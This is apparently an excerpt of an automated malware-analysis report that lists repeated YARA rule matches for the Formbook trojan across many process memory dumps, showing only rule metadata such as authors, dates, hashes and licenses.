              Source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
